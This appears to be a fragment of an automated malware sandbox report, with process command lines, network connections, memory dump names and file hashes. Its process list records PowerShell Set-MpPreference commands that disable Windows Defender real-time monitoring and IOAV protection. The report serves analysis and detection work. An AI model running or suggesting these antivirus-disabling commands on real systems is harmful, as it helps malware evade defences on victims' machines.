powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 72.21.81.240:80 | tcp | |
| US | 72.21.81.240:80 | tcp |
Files
memory/2972-130-0x0000027BF0D40000-0x0000027BF0D62000-memory.dmp
memory/2972-131-0x0000027BD7C70000-0x0000027BD8731000-memory.dmp
memory/2972-132-0x0000027BF0CC8000-0x0000027BF0CC9000-memory.dmp
memory/2972-133-0x0000027BF0CC0000-0x0000027BF0CC2000-memory.dmp
memory/2972-134-0x0000027BF0CC3000-0x0000027BF0CC5000-memory.dmp
memory/2972-135-0x0000027BF0CC6000-0x0000027BF0CC8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a6bad9528f8e23fb5c77fbd81fa28e8 |
| SHA1 | f127317c3bc6407f536c0f0600dcbcf1aabfba36 |
| SHA256 | 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05 |
| SHA512 | 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2 |
memory/948-138-0x000002B14C140000-0x000002B14CC01000-memory.dmp
memory/948-139-0x000002B1651C8000-0x000002B1651C9000-memory.dmp
memory/948-140-0x000002B1651C0000-0x000002B1651C2000-memory.dmp
memory/948-141-0x000002B1651C3000-0x000002B1651C5000-memory.dmp
memory/948-142-0x000002B1651C6000-0x000002B1651C8000-memory.dmp